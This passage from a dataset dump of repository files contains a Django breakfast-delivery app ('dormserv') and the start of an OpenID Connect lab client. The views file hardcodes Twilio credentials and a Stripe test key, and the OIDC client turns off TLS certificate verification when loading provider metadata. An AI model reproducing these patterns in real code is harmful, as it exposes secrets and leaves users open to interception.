'stripe_format_str_price':stripe_format_str_price}, context)\n\n\teggs = []\n\tcoffee = []\n\toats = []\n\tbakery = []\n\tfruit = []\n\tyogurt = []\n\n\titem_list = []\n\tfor item in Item.objects.all():\n\t\titem_list.append(item)\n\t\tif item.item_category == \"EGG\":\n\t\t\teggs.append(item)\n\t\tif item.item_category == \"COF\":\n\t\t\tcoffee.append(item)\n\t\tif item.item_category == \"FRU\":\n\t\t\tfruit.append(item)\n\t\tif item.item_category == \"BAK\":\n\t\t\tbakery.append(item)\n\t\tif item.item_category == \"OAT\":\n\t\t\toats.append(item)\n\t\tif item.item_category == \"YOG\":\n\t\t\tyogurt.append(item)\n\n\tif current_entry.deliveries_avail == 0:\n\t\treturn HttpResponse(\"No more deliveries avail at this time!\")\n\n\treturn render_to_response(\n\t\t'menu.html', \n\t\t{'item_list':item_list, 'current_user':current_user, 'current_entry':current_entry, 'eggs':eggs, 'coffee':coffee, 'oats':oats, 'bakery':bakery, 'fruit':fruit, 'yogurt':yogurt,}, \n\t\tcontext)\n\n@login_required\ndef profile(request):\n\tcontext = RequestContext(request)\n\tcurrent_user = request.user\n\treturn render_to_response('profile.html', {'current_user':current_user,}, context)\n\n@login_required\ndef validate_purchase(request, entry_id):\n\tcontext = RequestContext(request)\n\tcurrent_entry = Entry.objects.get(id=entry_id)\n\tcurrent_user = request.user\n\tif current_entry.deliveries_avail == 0:\n\t\treturn HttpResponse(\"No more deliveries avail at this time!\")\n\t'''\n\t# Set your secret key: remember to change this to your live secret key in production\n\t# See your keys here https://manage.stripe.com/account\n\tstripe.api_key = \"sk_test_4qn67c9y4axf9qYUKtg8JSa9\"\n\n\t# Get the credit card details submitted by the form\n\ttoken = request.POST.get('stripeToken')\n\n\t# Create the charge on Stripe's servers - this will charge the user's card\n\ttry:\n\t charge = stripe.Charge.create(\n\t amount=1000, # amount in cents, again\n\t currency=\"usd\",\n\t card=token,\n\t description=\"[email protected]\"\n\t )\n\texcept stripe.CardError, e:\n\t # The card has been declined\n\t pass\n\t'''\n\t#print current_entry.deliveries_avail\n\tcurrent_entry.decrease_deliveries_avail()\n\tcurrent_entry.save()\n\t#print current_entry.deliveries_avail\n\tthis_user = UserProfile.objects.get(id=(current_user.id-1))\n\taccount_sid = \"ACd2d6a002416aad11df6d7b3d529506b2\"\n\tauth_token = \"616085bee1e2c14db70339a86bfa9dda\"\n\tclient = TwilioRestClient(account_sid, auth_token)\n\tmessage = client.sms.messages.create(body=this_user.user.first_name + \", thanks for your order to be delivered at \" + current_entry.display_time() + \" from Dormserv!\", to= this_user.phone, from_=\"+19146185355\") # Replace with your Twilio number\n\t#print message.sid\n\n\tlist_of_greetings = [\"It's that easy.\", \"All done.\", \"Thanks for your order.\", \"Isn't this the best?\", \"That's breakfast done right.\", \"Isn't this the best thing since the C-1 Express?\"]\n\tgreeting_to_return = \"\"\n\tr = randint(0,len(list_of_greetings)-1)\n\tfor n in range(len(list_of_greetings)):\n\t\tif r == n:\n\t\t\tgreeting_to_return = list_of_greetings[n]\n\n\treturn render_to_response(\n\t\t'thanks.html', \n\t\t{'greeting_to_return':greeting_to_return, 'current_user':current_user}, \n\t\tcontext)\n"
},
{
"alpha_fraction": 0.3457481861114502,
"alphanum_fraction": 0.35234013199806213,
"avg_line_length": 39.459999084472656,
"blob_id": "c837871aa31ef552768809fce636e79c671d14d0",
"content_id": "1744bf9afb381dd8dcf6c0a474e56fe2685e566f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 6068,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 150,
"path": "/dormserv/cal/templates/calendar.html",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n\n{% load staticfiles %}\n<link rel=\"stylesheet\" type=\"text/css\" href=\"{% static 'cal/css/dormserv.css' %}\"/>\n<link rel=\"stylesheet\" type=\"text/css\" href=\"{% static 'cal/css/bootstrap.css' %}\"/>\n\n\n<html>\n <head>\n <title>Dormserv Calendar</title>\n </head>\n\n {% include 'head.html' %}\n \n <div id=\"wrap\">\n <!--\n <div id=\"nav\">\n <a href=\"/\">\n <div class=\"imagewrapper\">\n <img src=\"{% static \"cal/images/12.png\" %}\" alt=\"dormserv\"/>\n </div>\n </a>\n </div>\n !-->\n\n <body>\n {% csrf_token %}\n\n {% if user.is_authenticated %}\n {% else %}\n <a href=\"/register/\">Register Here</a><br />\n <a href=\"/login/\">Login</a><br />\n {% endif %}\n\n <div class=\"progress\">\n <div class=\"progress-bar\" role=\"progressbar\" aria-valuenow=\"25\" aria-valuemin=\"0\" aria-valuemax=\"100\" style=\"width: 25%;\">\n <span class=\"sr-only\">25% Complete</span>\n </div>\n </div>\n\n\n <div id = \"cal_head\">\n <div id = \"cal_head_top\">\n <h1>Morning, {{ current_user.first_name }}.</h1>\n </div>\n <div id = \"cal_head_bottom\">\n <h2>When do you want your breakfast?</h2>\n </div>\n </div>\n\n <table border='1' cellspacing='2' cellpadding='1'>\n <tr>\n <td><center><p><h5><b>Monday, {{ date_tuple.0 }}</b></h5></p></center></td>\n <td><center><p><h5><b>Tuesday, {{ date_tuple.1 }}</b></h5></p></center></td>\n <td><center><p><h5><b>Wednesday, {{ date_tuple.2 }}</b></h5></p></center></td>\n <td><center><p><h5><b>Thursday, {{ date_tuple.3 }}</b></h5></p></center></td>\n <td><center><p><h5><b>Friday, {{ date_tuple.4 }}</b></h5></p></center></td>\n <td><center><p><h5><b>Saturday, {{ date_tuple.5 }}</b></h5></p></center></td>\n <td><center><p><h5><b>Sunday, {{ date_tuple.6 }}</b></h5></p></center></td>\n </tr>\n <tr>\n <tr>\n <td>\n {% for deliv in mon %}\n <br>\n <div id = \"deliv_slot\">\n {% if deliv.is_active %}\n <center><a href=\"{{ deliv.id }}\">{{ deliv.display_time }} - {{ deliv.fifteen_over }}</a></center>\n {% else %}\n <center>{{ deliv.display_time }}- {{ deliv.fifteen_over }}</center>\n {% endif %}\n </div>\n {% endfor %}\n </td>\n <td>\n {% for deliv in tue %}\n <br>\n <div id = \"deliv_slot\">\n {% if deliv.is_active %}\n <center><a href=\"{{ deliv.id }}\">{{ deliv.display_time }} - {{ deliv.fifteen_over }} </a></center>\n {% else %}\n <center>{{ deliv.display_time }} - {{ deliv.fifteen_over }}</center>\n {% endif %}\n </div>\n {% endfor %}\n </td>\n <td>\n {% for deliv in wed %}\n <br>\n <div id = \"deliv_slot\">\n {% if deliv.is_active %}\n <center><a href=\"{{ deliv.id }}\">{{ deliv.display_time }} - {{ deliv.fifteen_over }}</a></center>\n {% else %}\n <center>{{ deliv.display_time }} - {{ deliv.fifteen_over }}</center>\n {% endif %}\n </div>\n {% endfor %}\n </td>\n <td>\n {% for deliv in thurs %}\n <br>\n <div id = \"deliv_slot\">\n {% if deliv.is_active %}\n <center><a href=\"{{ deliv.id }}\">{{ deliv.display_time }} - {{ deliv.fifteen_over }}</a></center>\n {% else %}\n <center>{{ deliv.display_time }} - {{ deliv.fifteen_over }}</center>\n {% endif %}\n </div>\n {% endfor %}\n </td>\n <td>\n {% for deliv in fri %}\n <br>\n <div id = \"deliv_slot\">\n {% if deliv.is_active %}\n <center><a href=\"{{ deliv.id }}\">{{ deliv.display_time }} - {{ deliv.fifteen_over }}</a></center>\n {% else %}\n <center>{{ deliv.display_time }} - {{ deliv.fifteen_over }}</center>\n {% endif %}\n </div>\n {% endfor %}\n </td>\n <td>\n {% for deliv in sat %}\n <br>\n <div id = \"deliv_slot\">\n {% if deliv.is_active %}\n <center><a href=\"{{ deliv.id 
}}\">{{ deliv.display_time }} - {{ deliv.fifteen_over }}</a></center>\n {% else %}\n <center>{{ deliv.display_time }} - {{ deliv.fifteen_over }}</center>\n {% endif %}\n </div>\n {% endfor %}\n </td>\n <td>\n {% for deliv in sun %}\n <br>\n <div id = \"deliv_slot\">\n {% if deliv.is_active %}\n <center><a href=\"{{ deliv.id }}\">{{ deliv.display_time }} - {{ deliv.fifteen_over }}</a></center>\n {% else %}\n <center>{{ deliv.display_time }} - {{ deliv.fifteen_over }}</center>\n {% endif %}\n </div>\n {% endfor %}\n </td>\n </table>\n </div>\n </body>\n</html>"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 34,
"blob_id": "02a4c932162f63aa1cd2a1ecee9eb1abf5796d5b",
"content_id": "00e0d43a1f2dab30600f32d8153c3e773b4eaa0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 35,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 1,
"path": "/README.md",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "This is the dormserv project code.\n"
},
{
"alpha_fraction": 0.6780045628547668,
"alphanum_fraction": 0.680272102355957,
"avg_line_length": 43.20000076293945,
"blob_id": "f3bd9a3866026ba2c0e495b170c155f8cf478869",
"content_id": "eec80e507228aadd7be360d0c5d5814aa59cf667",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 441,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 10,
"path": "/cal/urls.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, url\nfrom cal import views\n\nurlpatterns = patterns('',\n\turl(r'^$', views.display_calendar, name='display_calendar'),\n\turl(r'^(?P<entry_id>\\d+)/$', views.detail, name='detail'),\n\turl(r'^(?P<entry_id>\\d+)/detail/validate_purchase', views.validate_purchase, name='validate_purchase'),\n\turl(r'^(?P<entry_id>\\d+)/detail', views.detail, name='detail2'),\n\turl(r'^profile', views.profile, name='profile'),\n )"
},
{
"alpha_fraction": 0.5563380122184753,
"alphanum_fraction": 0.5610328912734985,
"avg_line_length": 19.33333396911621,
"blob_id": "3316de3c2603d686f3f70f882a7ca2f595d7510a",
"content_id": "0f73962c789ca639e0257205e2245757bbcb89d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 426,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 21,
"path": "/cal/templates/profile.html",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n\n{% load staticfiles %}\n<link rel=\"stylesheet\" type=\"text/css\" href=\"{% static 'cal/css/dormserv.css' %}\"/>\n<link rel=\"stylesheet\" type=\"text/css\" href=\"{% static 'cal/css/bootstrap.css' %}\"/>\n\n\n<html>\n <head>\n <title>My Profile</title>\n </head>\n {% include 'head.html' %}\n\n <body>\n \t<div id=\"wrap\">\n \t\t<h1>{{ current_user.first_name }}'s Profile</h1>\n \t</div>\n\n \t</body>\n\n</html>"
},
{
"alpha_fraction": 0.649350643157959,
"alphanum_fraction": 0.649350643157959,
"avg_line_length": 16.846153259277344,
"blob_id": "fe1a76aeab1da2d0f3573e54220d441470b1f14d",
"content_id": "2f96b5e50928927777785a7503f8d1b62dd128af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 231,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 13,
"path": "/dormserv/delete_all_on_cal.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from cal.models import Entry\nfrom datetime import date, time, timedelta\nimport datetime\n\n\ndef handle():\n for e in Entry.objects.all():\n e.delete()\n\n print \"Successfully deleted\"\n\nif __name__ == \"__main__\":\n handle()"
},
{
"alpha_fraction": 0.7479674816131592,
"alphanum_fraction": 0.7479674816131592,
"avg_line_length": 19.5,
"blob_id": "0fc01b44d9ce1a7ab2c4c9808bd65abc40ede7fa",
"content_id": "7c9f999e506b0628b8de2a817b7f365106b4b7af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 6,
"path": "/dormserv/cal/forms.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom cal.models import Item\n\nclass ItemForm(forms.ModelForm):\n\tclass Meta:\n\t\tfields = ('wanted',)\n"
},
{
"alpha_fraction": 0.6267049312591553,
"alphanum_fraction": 0.6302943229675293,
"avg_line_length": 21.126983642578125,
"blob_id": "f92e5ff2c71015a93c33083055a93541af880a1a",
"content_id": "bf598f87b86ed48723597534daf83304ba2a55c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1393,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 63,
"path": "/users/models.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\n\nclass UserProfile(models.Model):\n\tALSPLAUGH = 'ALS'\n\tBASSETT = 'BAS'\n\tBROWN = 'BRO'\n\tPEGRAM = 'PEG'\n\tAYCOCK = 'AYC'\n\tEPWORTH = 'EPW'\n\tGILES = 'GIL'\n\tJARVIS = 'JAR'\n\tWILSON = 'WIL'\n\tGILBERT_ADDOMS = 'GAD'\n\tSOUTHGATE = 'SOU'\n\tBELL_TOWER = 'BTW'\n\tBLACKWELL = 'BLA'\n\tRANDOLPH = 'RAN'\n\tCRAVEN = 'CRA'\n\tCROWELL = 'CRO'\n\tWANNAMAKER = 'WAN'\n\tEDENS = 'EDE'\n\tFEW = 'FEW'\n\tKEOHANE = 'KEO'\n\tKILGO = 'KIL'\n\tEAST = 'EAS'\n\tCENTRAL = 'CEN'\n\tBLANK = ' '\n\tQUAD_CHOICES = (\n\t\t(BLANK, 'Choose a quad...'),\n\t\t(CENTRAL, 'Central Campus'),\n\t\t(ALSPLAUGH, 'Alsplaugh'),\n\t\t(AYCOCK, 'Aycock'),\n\t\t(BASSETT, 'Bassett'),\n\t\t(BELL_TOWER, 'Bell Tower'),\n\t\t(BLACKWELL, 'Blackwell'),\n\t\t(BROWN, 'Brown'),\n\t\t(CRAVEN, 'Craven'),\n\t\t(CROWELL, 'Crowell'),\n\t\t(EDENS, 'Edens'),\n\t\t(EPWORTH, 'Epworth'),\n\t\t(FEW, 'Few'),\n\t\t(GILBERT_ADDOMS, 'Gilbert-Addoms'),\n\t\t(GILES, 'Giles'),\n\t\t(JARVIS, 'Jarvis'),\n\t\t(KEOHANE, 'Keohane'),\n\t\t(KILGO, 'Kilgo'),\n\t\t(PEGRAM, 'Pegram'),\n\t\t(RANDOLPH, 'Randolph'),\n\t\t(SOUTHGATE, 'Southgate'),\n\t\t(WANNAMAKER, 'Wannamaker'),\n\t\t(WILSON, 'Wilson'),\n\t)\n\tuser = models.OneToOneField(User)\n\tdorm = models.CharField(max_length=3, choices=QUAD_CHOICES, default=BLANK)\n\tsection = models.CharField(max_length=2)\n\troom = models.CharField(max_length=7)\n\tphone = models.CharField(max_length=20)\n\n\n\n\tdef __unicode__(self):\n\t\treturn self.user.username"
}
] | 14 |
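The UserProfile model above stores dorms as three-letter codes via the QUAD_CHOICES tuple; for any CharField with choices, Django auto-generates a get_<field>_display() accessor that returns the human-readable label. A short sketch (assumes at least one saved profile exists):

```python
# Sketch: reading back a choices field. get_dorm_display() is generated by
# Django from QUAD_CHOICES; the database stores only the short code.
from users.models import UserProfile

profile = UserProfile.objects.select_related('user').first()
if profile is not None:
    print(profile.dorm)                # stored code, e.g. 'KIL'
    print(profile.get_dorm_display())  # readable label, e.g. 'Kilgo'
```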
HarryKodden/oidc-lab | https://github.com/HarryKodden/oidc-lab | b3a6b1c765b3b9cea70bf789dfc88809a49ba8df | a5adc3d626064ef509da6faf49222df5a181245f | e825a3b03989a0655cb97d1362ca37cd20f8bfec | refs/heads/master | 2022-09-15T04:45:52.065573 | 2022-08-29T14:26:26 | 2022-08-29T14:26:26 | 154,526,557 | 3 | 2 | null | 2018-10-24T15:39:35 | 2019-11-12T07:57:05 | 2019-11-26T12:24:37 | Python |
[
{
"alpha_fraction": 0.5854426026344299,
"alphanum_fraction": 0.5899985432624817,
"avg_line_length": 32.85067367553711,
"blob_id": "b12b5882eb8ed2e72bc9a12e6b454773854c975f",
"content_id": "6eed98dd36896b2967175f4c8d3781b01430638a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 27656,
"license_type": "no_license",
"max_line_length": 220,
"num_lines": 817,
"path": "/oidc-lab.py",
"repo_name": "HarryKodden/oidc-lab",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\"oidc-lab.py: Core functionality of the application.\n\"\"\"\n\n__author__ = \"Harry Kodden\"\n__copyright__ = \"Copyright 2018, SURFnet\"\n__version__ = \"1.0\"\n__maintainer__ = \"Harry Kodden\"\n__email__ = \"[email protected]\"\n__status__ = \"Development\"\n\nimport os\nimport json\nimport logging\nimport urllib\nimport requests\nimport jwt\nimport ssl\nimport base64\n\nfrom flask import Flask, g, redirect, current_app, request, render_template, Response, session\nfrom flask.helpers import make_response\nfrom flask_oidc import OpenIDConnect, DummySecretsCache\nfrom flask_restful import abort, Api, Resource\nfrom oauth2client.client import flow_from_clientsecrets, OAuth2WebServerFlow, AccessTokenRefreshError, OAuth2Credentials\nfrom base64 import urlsafe_b64encode\nimport httplib2\nfrom six.moves.urllib.parse import urlencode\n\nimport gevent\nfrom gevent.pywsgi import WSGIServer\nfrom gevent.queue import Queue\n\nLOG_LEVEL = os.environ.get('LOG_LEVEL', 'DEBUG').upper()\n\nlogging.basicConfig(\n level=LOG_LEVEL,\n format='%(asctime)s [%(levelname)s] %(message)s'\n)\n\nlogger = logging.getLogger(__name__)\n\nPORT = 8000\nHOST = os.environ.get(\"HOST\", \"localhost:%d\"% (PORT))\n\nif HOST.startswith(\"localhost\"):\n SCHEME = \"http\"\nelse:\n SCHEME = \"https\"\n\nREQUESTED_SCOPES = ['openid', 'email', 'profile']\n\nCALLBACK = \"/oidc_callback\"\nBACKCHANNEL_LOGOUT = \"/logout\"\n\nREDIRECT_URL = \"{}://{}{}\".format(SCHEME, HOST, CALLBACK)\n\napp = Flask(__name__)\n\napp.config.update({\n 'server' : 'https://eduid.lab.surf.nl/auth/',\n 'realm' : 'eduID',\n 'client_id': 'portal',\n 'SECRET_KEY': 'SomethingNotEntirelySecret',\n 'TESTING': True,\n 'DEBUG': True,\n \"PREFERRED_URL_SCHEME\": SCHEME,\n 'OIDC_CLIENT_SECRETS': None,\n 'OIDC_ID_TOKEN_COOKIE_SECURE': False,\n 'OIDC_REQUIRE_VERIFIED_EMAIL': False,\n 'OIDC_OPENID_REALM': None,\n 'OIDC_USER_INFO_ENABLED': True,\n 'OIDC_SCOPES': REQUESTED_SCOPES,\n 'OIDC_INTROSPECTION_AUTH_METHOD': 'client_secret_post'\n})\n\nALLOWED_REGISTRATTION_ATTRIBUTES = ['client_id', 'client_secret']\n\nclass _Registration(dict):\n def __init__(self, data):\n logger.debug('New Registration: {}'.format(data))\n\n assert 'client_id' in data, \"'client_id' is missing in registration\"\n assert 'client_secret' in data, \"'client_secret' is missing in registration\"\n\n for i in data.keys():\n self[i] = data[i]\n\n def __getitem__(self, key):\n if key == 'client_secret':\n return '*******'\n elif key == '*client_secret*':\n return super().__getitem__('client_secret')\n else:\n return super().__getitem__(key)\n\n def get(self,key,default=None):\n try:\n return self[key]\n except:\n return default\n\n def __setitem__(self, key, value):\n logger.debug('- [REGISTRATION] {} := {}'.format(key, value))\n\n assert key in ALLOWED_REGISTRATTION_ATTRIBUTES, \\\n \"attribute {} not valid, only {} allowed\". 
format(key, ALLOWED_REGISTRATTION_ATTRIBUTES)\n\n super().__setitem__(key, value)\n\nALLOWED_PROVIDER_ATTRIBUTES = ['base_url', 'description', 'client_name', 'registration', 'scopes']\n\nclass _Provider(dict):\n\n def __init__(self, data):\n logger.debug('New Provider: {}'.format(data))\n\n assert 'base_url' in data, \"'base_url' missing\"\n\n for i in data.keys():\n self[i] = data[i]\n\n def get(self,key,default=None):\n try:\n return self[key]\n except:\n return default\n\n def __getitem__(self, key):\n return super().__getitem__(key)\n\n def __setitem__(self, key, value):\n logger.debug('- [PROVIDER] {} := {}'.format(key, value))\n\n assert key in ALLOWED_PROVIDER_ATTRIBUTES, \\\n \"attribute {} not valid, only {} allowed\". format(key, ALLOWED_PROVIDER_ATTRIBUTES)\n\n if key == 'registration':\n super().__setitem__(key, _Registration(value))\n else:\n super().__setitem__(key, value)\n\nPROVIDERS = {}\n\ndef abort_if_provider_doesnt_exist(name):\n if name not in PROVIDERS:\n abort(404, message=\"Provider {} doesn't exist\".format(name))\n\ndef get_dict(value):\n\n if isinstance(value, dict):\n result = {}\n\n for i in value.keys():\n result[i] = get_dict(value[i])\n\n return result\n elif isinstance(value, list):\n result = []\n\n for i in value:\n result.append(i)\n\n return result\n else:\n return value\n\nclass Provider(Resource):\n def get(self, name):\n abort_if_provider_doesnt_exist(name)\n return get_dict(PROVIDERS[name])\n\n def delete(self, name):\n abort_if_provider_doesnt_exist(name)\n del PROVIDERS[name]\n return '', 204\n\n def put(self, name):\n logger.debug(\"PUT Provider: {}...\".format(name))\n\n try:\n data = request.get_json()\n\n assert data != None, \"missing provider definition\"\n\n PROVIDERS[name] = _Provider(data)\n\n except Exception as e:\n\n logger.debug(\"Error: {}\".format(str(e)))\n abort(404, message=\"{}\".format(str(e)))\n\n return self.get(name), 201\n\nclass Providers(Resource):\n def get(self):\n return get_dict(PROVIDERS)\n\napi = Api(app)\napi.add_resource(Provider, '/api/provider/<name>')\napi.add_resource(Providers, '/api/providers')\n\nfrom itsdangerous import JSONWebSignatureSerializer, TimedJSONWebSignatureSerializer\n\nclass MyOpenIDConnect(OpenIDConnect):\n\n def __init__(self, app=None, credentials_store=None, http=None, time=None,\n urandom=None, provider=None):\n\n super().__init__(credentials_store, http, time, urandom)\n\n self.client_secrets = None\n\n if app:\n self.init_app(app)\n\n if provider:\n self.init_provider(provider)\n\n def init_app(self, app):\n \"\"\"\n Do setup that requires a Flask app.\n\n :param app: The application to initialize.\n :type app: Flask\n \"\"\"\n # Set some default configuration options\n app.config.setdefault('OIDC_SCOPES', REQUESTED_SCOPES)\n app.config.setdefault('OIDC_GOOGLE_APPS_DOMAIN', None)\n app.config.setdefault('OIDC_ID_TOKEN_COOKIE_NAME', 'oidc_id_token')\n app.config.setdefault('OIDC_ID_TOKEN_COOKIE_PATH', '/')\n app.config.setdefault('OIDC_ID_TOKEN_COOKIE_TTL', 7 * 86400) # 7 days\n # should ONLY be turned off for local debugging\n app.config.setdefault('OIDC_COOKIE_SECURE', True)\n app.config.setdefault('OIDC_VALID_ISSUERS',None)\n app.config.setdefault('OIDC_CLOCK_SKEW', 6000) # 1 minute\n app.config.setdefault('OIDC_REQUIRE_VERIFIED_EMAIL', False)\n app.config.setdefault('OIDC_OPENID_REALM', None)\n app.config.setdefault('OIDC_USER_INFO_ENABLED', True)\n app.config.setdefault('OIDC_CALLBACK_ROUTE', CALLBACK)\n app.config.setdefault('OVERWRITE_REDIRECT_URI', REDIRECT_URL)\n 
app.config.setdefault(\"OIDC_EXTRA_REQUEST_AUTH_PARAMS\", {})\n # Configuration for resource servers\n app.config.setdefault('OIDC_RESOURCE_SERVER_ONLY', False)\n app.config.setdefault('OIDC_RESOURCE_CHECK_AUD', False)\n\n # We use client_secret_post, because that's what the Google\n # oauth2client library defaults to\n app.config.setdefault('OIDC_INTROSPECTION_AUTH_METHOD', 'client_secret_post')\n app.config.setdefault('OIDC_TOKEN_TYPE_HINT', 'access_token')\n\n if not 'openid' in app.config['OIDC_SCOPES']:\n raise ValueError('The value \"openid\" must be in the OIDC_SCOPES')\n\n # register callback route and cookie-setting decorator\n if not app.config['OIDC_RESOURCE_SERVER_ONLY']:\n app.route(app.config['OIDC_CALLBACK_ROUTE'])(self._oidc_callback)\n app.before_request(self._before_request)\n app.after_request(self._after_request)\n\n # create signers using the Flask secret key\n self.extra_data_serializer = JSONWebSignatureSerializer(\n app.config['SECRET_KEY'])\n self.cookie_serializer = TimedJSONWebSignatureSerializer(\n app.config['SECRET_KEY'])\n\n try:\n self.credentials_store = app.config['OIDC_CREDENTIALS_STORE']\n except KeyError:\n pass\n\n def refresh(self):\n\n id_token = self._get_cookie_id_token()\n\n try:\n credentials = OAuth2Credentials.from_json(\n self.credentials_store[id_token['sub']])\n except KeyError:\n logger.debug(\"Expired ID token, credentials missing\",\n exc_info=True)\n\n # refresh and store credentials\n try:\n credentials.refresh(httplib2.Http())\n if credentials.id_token:\n id_token = credentials.id_token\n self.credentials_store[id_token['sub']] = credentials.to_json()\n self._set_cookie_id_token(id_token)\n except AccessTokenRefreshError:\n logger.debug(\"Failed to refresh !\")\n\n def _before_request(self):\n g.oidc_id_token = None\n\n if self.client_secrets:\n self.authenticate_or_redirect()\n\n def redirect_to_auth_server(self, destination=None, customstate=None):\n \"\"\"\n Set a CSRF token in the session, and redirect to the IdP.\n\n :param destination: The page that the user was going to,\n before we noticed they weren't logged in.\n :type destination: Url to return the client to if a custom handler is\n not used. Not available with custom callback.\n :param customstate: The custom data passed via the ODIC state.\n Note that this only works with a custom_callback, and this will\n ignore destination.\n :type customstate: Anything that can be serialized\n :returns: A redirect response to start the login process.\n :rtype: Flask Response\n\n .. 
deprecated:: 1.0\n Use :func:`require_login` instead.\n \"\"\"\n if not self._custom_callback and customstate:\n raise ValueError('Custom State is only avilable with a custom '\n 'handler')\n if 'oidc_csrf_token' not in session:\n csrf_token = urlsafe_b64encode(os.urandom(24)).decode('utf-8')\n session['oidc_csrf_token'] = csrf_token\n state = {\n 'csrf_token': session['oidc_csrf_token'],\n }\n statefield = 'destination'\n statevalue = destination\n if customstate is not None:\n statefield = 'custom'\n statevalue = customstate\n state[statefield] = self.extra_data_serializer.dumps(\n statevalue).decode('utf-8')\n\n extra_params = {\n 'state': urlsafe_b64encode(json.dumps(state).encode('utf-8')),\n }\n extra_params.update(current_app.config['OIDC_EXTRA_REQUEST_AUTH_PARAMS'])\n if current_app.config['OIDC_GOOGLE_APPS_DOMAIN']:\n extra_params['hd'] = current_app.config['OIDC_GOOGLE_APPS_DOMAIN']\n if current_app.config['OIDC_OPENID_REALM']:\n extra_params['openid.realm'] = current_app.config[\n 'OIDC_OPENID_REALM']\n\n flow = self._flow_for_request()\n auth_url = '{url}&{extra_params}'.format(\n url=flow.step1_get_authorize_url(),\n extra_params=urlencode(extra_params))\n # if the user has an ID token, it's invalid, or we wouldn't be here\n self._set_cookie_id_token(None)\n return redirect(auth_url)\n\n def init_provider(self, provider):\n \"\"\"\n Do setup for a specific provider\n\n :param provider: The provider to initialize.\n :type provider: Dictionary with at lease 'base_url' item\n \"\"\"\n\n secrets = self.load_secrets(provider)\n assert secrets != None, \"Problem with loading secrets\"\n\n self.client_secrets = list(secrets.values())[0]\n secrets_cache = DummySecretsCache(secrets)\n\n # Initialize oauth2client\n self.flow = flow_from_clientsecrets(\n current_app.config['OIDC_CLIENT_SECRETS'],\n scope=current_app.config['OIDC_SCOPES'],\n cache=secrets_cache)\n\n assert isinstance(self.flow, OAuth2WebServerFlow)\n\n if current_app.config['OIDC_INTROSPECTION_AUTH_METHOD'] == 'client_secret_basic':\n basic_auth_string = '%s:%s' % (self.client_secrets['client_id'], self.client_secrets['client_secret'])\n basic_auth_bytes = bytearray(basic_auth_string, 'utf-8')\n self.flow.authorization_header = 'Basic %s' % base64.b64encode(basic_auth_bytes).decode('utf-8')\n\n current_app.config['OIDC_VALID_ISSUERS'] = self.client_secrets.get('issuer')\n\n def logout(self):\n logger.debug(\"logging out...\")\n\n super().logout()\n\n def __exit__(self, exception_type, exception_value, traceback):\n self.logout()\n\n current_app.config['OIDC_VALID_ISSUERS'] = None\n\n if self.client_secrets:\n logger.debug(\"Closing connection with current provider...\")\n self.client_secrets = None\n\n def _is_id_token_valid(self, id_token):\n if 'aud' in id_token and isinstance(id_token['aud'], list) and len(id_token['aud']) == 1:\n id_token['aud'] = id_token['aud'][0]\n\n return super()._is_id_token_valid(id_token)\n\n def token(self):\n \n try:\n return self.credentials_store[g.oidc_id_token['sub']]\n except KeyError:\n logger.debug(\"No Token !\", exc_info=True)\n return None\n\n def details(self):\n return self._retrieve_userinfo()\n\n def load_secrets(self, provider):\n if not provider:\n return None\n\n try:\n url = provider.get('base_url')\n\n if not url.endswith('/'):\n url += '/'\n\n url += \".well-known/openid-configuration\"\n\n logger.debug(\"Loading: {}\".format(url))\n context = ssl._create_unverified_context()\n response = urllib.request.urlopen(url, context=context)\n \n provider_info = 
json.load(response)\n\n except Exception as e:\n raise Exception(\"Can not obtain well known information: {}\".format(str(e)))\n\n for path in ['issuer', 'registration_endpoint', 'authorization_endpoint', 'token_endpoint', 'userinfo_endpoint']:\n if path in provider_info and provider_info[path].startswith('/'):\n provider_info[path] = \"{}{}\".format(provider.get('base_url'), provider_info[path])\n\n for method in provider_info.get('token_endpoint_auth_methods_supported',[]):\n current_app.config['OIDC_INTROSPECTION_AUTH_METHOD'] = method\n break # Just take first...\n\n registration = provider.get('registration', None)\n\n if not registration:\n try:\n logger.debug(\"Dynamic Registration...\")\n\n registration = requests.post(\n provider_info['registration_endpoint'],\n data = json.dumps({\n \"redirect_uris\": REDIRECT_URL,\n \"grant_types\": \"authorization_code\",\n \"client_name\": provider.get('client_name', \"Dynamic Registration\"),\n \"response_types\": \"code\",\n \"token_endpoint_auth_method\": \"client_secret_post\",\n \"application_type\": \"native\"\n }),\n headers = {\n 'Content-Type': \"application/json\",\n 'Cache-Control': \"no-cache\"\n }\n ).json()\n\n logger.debug(\"Registration: {}\".format(registration))\n\n except Exception as e:\n raise Exception(\"Can not make client registration: {}\".format(str(e)))\n\n try:\n try:\n jwks_keys = json.load(\n urllib.request.urlopen(provider_info['jwks_uri'])\n )\n except:\n jwks_keys = 